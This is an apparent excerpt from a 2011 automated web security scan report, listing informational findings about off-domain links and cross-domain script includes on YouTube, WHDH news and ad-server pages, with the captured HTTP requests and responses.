<a href="http://youtube-global.blogspot.com/">JoshSundquist is January’s “On the Rise” star</a>
...[SNIP]...
<p class="alignR">
<a href="http://youtube-global.blogspot.com/">Read more in our Blog</a>
...[SNIP]...
<li><a href="http://code.google.com/apis/youtube/overview.html">Developers</a>
...[SNIP]...
<li><a href="http://www.google.com/support/youtube/bin/static.py?p=homepage&amp;page=start.cs&amp;hl=en_US" onmousedown="yt.analytics.trackEvent('Footer', 'link', 'Help');">Help</a>
...[SNIP]...
<li><a href="http://www.google.com/support/youtube/bin/request.py?contact_type=abuse&amp;hl=en_US" onmousedown="yt.analytics.trackEvent('Footer', 'link', 'Safety');">Safety</a>
...[SNIP]...
</span>

<a href="http://www.google.com/tools/feedback/intl/en/error.html" onclick="return yt.www.feedback.start('en', {&quot;accept_language&quot;: &quot;en&quot;});" id="reportbug">Report a bug</a>
...[SNIP]...
<div id="quicklist-player-close"><img onclick="yt.www.navigation.expandPlayer();" class="master-sprite expand-button" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"><img onclick="yt.www.navigation.closePlayer();" class="master-sprite close-button" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"></div>
...[SNIP]...
<div id="quicklist-notifications" style="display: none;" class="yt-alert yt-alert-success yt-alert-small yt-alert-naked yt-rounded">
<img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" class="icon master-sprite" alt="Alert icon">

<div class="yt-alert-content">
...[SNIP]...
pe="button" class="master-sprite yt-uix-tooltip yt-uix-tooltip-masked start start-edge yt-uix-button yt-uix-tooltip" onclick=";return false;" title="Previous video" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-prev" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button><button type="button" class="master-sprite yt-uix-tooltip yt-uix-tooltip-masked end yt-uix-button" onclick=";return false;" id="quicklist-next-button" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-next" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>
...[SNIP]...
ist-play-button" type="button" class="master-sprite yt-uix-tooltip yt-uix-tooltip-masked yt-uix-button yt-uix-tooltip" onclick=";return false;" title="Play videos" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-play" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>
...[SNIP]...
</span> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""><div style="display:none;" class="yt-uix-button-menu">
...[SNIP]...
aster-sprite yt-uix-tooltip yt-uix-tooltip-masked start quicklist-active yt-uix-button yt-uix-button-toggle" onclick=";return false;" id="quicklist-autoplay-button" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-autoplay" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>
...[SNIP]...
master-sprite yt-uix-tooltip yt-uix-tooltip-masked start quicklist-active yt-uix-button yt-uix-button-toggle" onclick=";return false;" id="quicklist-shuffle-button" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-shuffle" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button><button type="button" class="master-sprite yt-uix-tooltip yt-uix-tooltip-masked end end-edge yt-uix-button" onclick=";return false;" id="quicklist-toggle-button" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-toggle" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>
...[SNIP]...
<button class="yt-uix-button quicklist-tray-button yt-uix-slider-prev" onclick="return false;"><img class="yt-uix-slider-prev-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Previous"></button><button class="yt-uix-button quicklist-tray-button yt-uix-slider-next" onclick="return false;"><img class="yt-uix-slider-next-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Next"></button>
...[SNIP]...
<li class="empty quicklist-help-message">Your queue is empty. Add videos to your queue using this button: <img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" class="addto-button-help"><br> or <a href="https://www.google.com/accounts/ServiceLogin?uilel=3&amp;service=youtube&amp;passive=true&amp;continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F%253Fhl%253Den%2526tab%253Dw1&amp;hl=en_US&amp;ltmpl=sso">sign in</a>
...[SNIP]...
<div id="quicklist-loading"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Loading..."><span id="quicklist-loading-message">
...[SNIP]...
<span class="yt-uix-button-menu-item " onclick="">
<a href="https://www.google.com/accounts/ServiceLogin?uilel=3&amp;service=youtube&amp;passive=true&amp;continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F%253Fhl%253Den%2526tab%253Dw1&amp;hl=en_US&amp;ltmpl=sso">Sign in</a>
...[SNIP]...

20.715. http://www.youtube.com/subscribe_widget

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /subscribe_widget

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.youtube.com/subscribe_widget?p=joomla
The response contains the following links to other domains:
  • http://i3.ytimg.com/i/Z5e4pbTFTF_Rtin9fh3_Zw/1.jpg
  • http://s.ytimg.com/yt/cssbin/www-subscribe-widget-vflpwxGne.css
  • http://s.ytimg.com/yt/img/help/youtube_icon_small-vfliqe9hM.jpg
  • http://s.ytimg.com/yt/img/loader-vflff1Mjj.gif
  • http://s.ytimg.com/yt/img/msg_icn/error_mini_tt-vflDGo6-c.gif
  • http://s.ytimg.com/yt/jsbin/www-subscribe-widget-vflMJanIs.js

Request

GET /subscribe_widget?p=joomla HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://community.joomla.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:20:43 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: GEO=0341a4aa07c201d99d06557f57bd4ecbcwsAAAAzVVOtwdbzTTzh+w==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 2953

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Subscribe to joomla</title>
<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-subscribe-widget-vflpwxGne.css">

</head>
...[SNIP]...
<a href="/user/joomla?feature=sub_widget_1" target="_top">
<img id="profile-picture" src="http://i3.ytimg.com/i/Z5e4pbTFTF_Rtin9fh3_Zw/1.jpg" alt="Profile Picture">
</a>
...[SNIP]...
<span class="spinner hid">
<img src="//s.ytimg.com/yt/img/loader-vflff1Mjj.gif" class="icon" alt="Working">
</span>
...[SNIP]...
<span id="failed_icon_subscribe" class="fail-icon hid">
<img src="//s.ytimg.com/yt/img/msg_icn/error_mini_tt-vflDGo6-c.gif" class="icon" alt="Failed">
</span>
...[SNIP]...
<span class="spinner hid">
<img src="//s.ytimg.com/yt/img/loader-vflff1Mjj.gif" class="icon" alt="Working">
</span>
...[SNIP]...
<span class="fail-icon hid">
<img src="//s.ytimg.com/yt/img/msg_icn/error_mini_tt-vflDGo6-c.gif" class="icon" alt="Failed">
</span>
...[SNIP]...
<div id="branding"><img src="//s.ytimg.com/yt/img/help/youtube_icon_small-vfliqe9hM.jpg" alt="YouTube logo"></div>

</div>

<script src="//s.ytimg.com/yt/jsbin/www-subscribe-widget-vflMJanIs.js"></script>
...[SNIP]...

20.716. http://www1.whdh.com/includes/elements/accordion_whdh

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /includes/elements/accordion_whdh

Issue detail

The page was loaded from a URL containing a query string:
  • http://www1.whdh.com/includes/elements/accordion_whdh?1295905242
The response contains the following link to another domain:
  • http://whdhstore.hipcricket.com/

Request

GET /includes/elements/accordion_whdh?1295905242 HTTP/1.1
Host: www1.whdh.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:53:57 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: accordion_whdh.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Cache-Control: max-age=3600
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:53:07 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107005 (MII-APC/1.6)
Content-Length: 3416

<div class='rbox rbox-sqbottom'><div class="rbox-t"><div class="first"><h3>Your Newscast</h3></div></div><div class="rbox-c-w"><div class='rbox-c' style='padding:0;'><div id='accordion1'><h3 rel="/i
...[SNIP]...
<div style='padding:10px;height:58px;clear:both;font-size:90%;background:#fff;border-bottom:1px solid #cfcfcf;'>
   <a href='http://whdhstore.hipcricket.com/' target="_blank"><img src='/images/icons/phonealert58.gif' style='border:0;float:left;margin:0 10px 0 0;' />
...[SNIP]...
<h4 style='font-size:14px;'><a href='http://whdhstore.hipcricket.com/' target="_blank">Weather Alerts</a>
...[SNIP]...
<h4 style='font-size:14px;'><a href='http://whdhstore.hipcricket.com/' target="_blank">Breaking News Alerts</a>
...[SNIP]...

20.717. http://www1.whdh.com/includes/elements/sidecol_video_box.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /includes/elements/sidecol_video_box.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www1.whdh.com/includes/elements/sidecol_video_box.php?c=91535&124142
The response contains the following links to other domains:

Request

GET /includes/elements/sidecol_video_box.php?c=91535&124142 HTTP/1.1
Host: www1.whdh.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; __utmc=208585492; __utmb=208585492.1.10.1295906131; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; ACC1TAB=1

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:21:51 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 325
Cache-Control: max-age=17181
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 03:07:22 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 mdw107101 (MII-APC/1.6)
Content-Length: 14241

<div class='slidethumbs3' id="vdthmbz3-1"><ul><li><a href='http://www1.whdh.com/video/player/?clipId=5497586&clipFormat=flv&topVideoCatNo=91535#?autoStart' title='<h3>Frozen pipes in Newton</h3><p>NEW
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5497586_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5497292_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5497146_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5497112_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5497058_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5497002_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5496185_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5496178_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5496134_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5496125_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5496121_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5496110_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5496103_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5496093_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495587_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495580_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495565_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495562_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495557_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495555_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495551_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495548_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495537_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495297_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495279_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495257_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495255_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495253_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495239_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5494391_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5494376_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5494360_vt.jpg' width='133' height='74' /></a>
...[SNIP]...

20.718. http://www1.whdh.com/includes/elements/sidecol_video_box.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /includes/elements/sidecol_video_box.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www1.whdh.com/includes/elements/sidecol_video_box.php?c=91535&124142
The response contains the following links to other domains:

Request

GET /includes/elements/sidecol_video_box.php?c=91535&124142 HTTP/1.1
Host: www1.whdh.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; __utmc=208585492; __utmb=208585492.1.10.1295906131; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; ACC1TAB=1

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 19:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 8018
Cache-Control: max-age=17051
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 00:25:04 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107002 (MII-APC/1.6)
Content-Length: 14226

<div class='slidethumbs3' id="vdthmbz3-1"><ul><li><a href='http://www1.whdh.com/video/player/?clipId=5497292&clipFormat=flv&topVideoCatNo=91535#?autoStart' title='<h3>Students evacuated from school</h
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5497292_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5497146_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5497112_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5497058_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5497002_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5496185_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5496178_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5496134_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5496125_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5496121_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5496110_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5496103_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5496093_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495587_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495580_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495565_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495562_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495557_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495555_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495551_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495548_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495537_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495297_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495279_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495257_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495255_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495253_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5495239_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5494391_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5494376_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5494360_vt.jpg' width='133' height='74' /></a>
...[SNIP]...
</div><img src='http://WHDH.IMAGES.worldnow.com/images/5494355_vt.jpg' width='133' height='74' /></a>
...[SNIP]...

20.719. http://www1.whdh.com/video/player/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /video/player/

Issue detail

The page was loaded from a URL containing a query string:
  • http://www1.whdh.com/video/player/?clipId=5497227&clipFormat=flv&topVideoCatNo=72115
The response contains the following links to other domains:
  • http://www.cw56.com/
  • http://www.facebook.com/7NEWS
  • http://www.google.com/jsapi
  • http://www.twitter.com/7News

Request

GET /video/player/?clipId=5497227&clipFormat=flv&topVideoCatNo=72115 HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:10 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=58
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 21:57:17 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 22068
Via: 1.1 dfw107017 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS Video</title>
<meta name="publisher" content="New England News Station
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
<map name="logomap"><area shape="rect" coords="269,64,318,82" href="http://www.cw56.com/" alt="Visit cw56.com" /></map>
...[SNIP]...
<div class='ui-helper-clearfix'><a href="http://www.facebook.com/7NEWS" target="_blank"><img src="http://www1.whdh.com/images/icons/fb18.gif" alt="7News on Facebook" /></a><a href="http://www.twitter.com/7News" target="_blank"><img src="http://www1.whdh.com/images/icons/twitter18.gif" alt="7News on Twitter" />
...[SNIP]...

21. Cross-domain script include
There are 1599 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


21.1. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The response dynamically includes the following script from another domain:
  • http://ad.doubleclick.net/adj/N6061.194450.CDN.TURN.COM/B4419610.3;abr=!ie;sz=468x60;ord=3442293584429726933?;click=http://r.turn.com/r/formclick/id/1TyK6MZ7xS_QzwQAcAABAA/url/;

Request

GET /server/ads.js?pub=6552283&cch=6553230&code=6554540&l=468x60&aid=25146571&ahcid=357440&bimpd=2wb0RWgXjYhVFhSdaZSvZ32VN1zGKOsk4ov2i8xHVnR0TwY8YE6gjVIS5MJFmkq2godKGQP5jeGRZOKTMN2DPtoklsfmT3ZxopeRfWXKmxbXuJDbTzEKBlvoWg22g08fQBLFzCXvYXkZJOm3FCPXkqPZwd49ogzwkuChi2oAN0q98Yd16mbfryO0v6b7W0VzMU1XDNtmd2fbCqHfl-bOLdphJr3EE0fC3CbZPy6kexTcMSjEcs4aHvsTkHfk60sItyKa63DoHWQFdWQuV51UaADBnZBrweC9c1vHrvKzBN7gz6f2eb9QWGoPXH87ysBrNA8vd4OeqOloKD4KO4hyFxcWjkdAxInVO9Grk85rDkUjqxRYx-TxGCSbMk0dlzlePuFYfd-0Dyn4P3apF4K7-ud30Lg4lLScyp28lK8k26xaeM3yn5dLx8Vmv7-WCyUiK43YnC00-N2rGpetgjUveL3wc-cQ7FRKnITKYzO3zYWcEISZYQ3K7SwVtCGhpriduMjxuTHZaiS7AIkfl75dGEmN4G-1ojp5K2MVoj7ClSFcv5-XUU5q4pXx6xAqrIe7hQsk85fZdNTnuj1_PDPsjnlx4A5fciM2ToJCqG_TCyWkfAEjXqI310WD2Pi5C3XIsFXYlHf7CLGcqzbXuxjA34TYJ7tTV8wwlrv7VDSXEBUy-EKCRGe7mtrcA-OGBKqnBsUx_9Fg59k79MGA4dHXJReht3ivBnz3hwow8XaUE6U&acp=AAABLbrqvaJXoHwA4-uMLkYoHs1YQ_fNzbFTEQ HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=uSIG8d80kGSu-3LVteb8dYo27UqqnCnwkfrXKyAV6Vld6ISB_q_vS5rapRhLZ6kjS6LzB--IPpW7f2lvGgmbV44a2HHwK-7WUoZJXI4UNi7dHrH8JOOm_45w1VVsmbQ-LO5mu_1bsdW1DTvfN8mMduV530E-cnnyNakd9XAJ5pw; fc=1WiKwfBkd2IP9DmYEvBTXecjeUUpq7AdXdV5QaZ3XbQBKx4ZZQvbzWrTNs9TlBo5BZ0EL66upofk3HmGTS_1gr3wc-cQ7FRKnITKYzO3zYV52dhK4dSErN9-EcLOAtq0; pf=ZNcym7VfDvuGzV9XuIE1r-QUWOHC4vVDwY-zzeE9S_KJwV9kSIzX4BtZ7vBDkFqiRgnA1fZrADJXYuYVL1y1CX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7Cundefined%7C10; rds=14987%7C14983%7C14999%7C14989%7Cundefined%7C14983%7C14983%7C14983%7C14983%7C14983%7C14987%7Cundefined%7C14983; rv=1; uid=3011330574290390485

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Thu, 27 Jan 2011 04:25:35 GMT
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sun, 24-Jul-2011 04:25:35 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
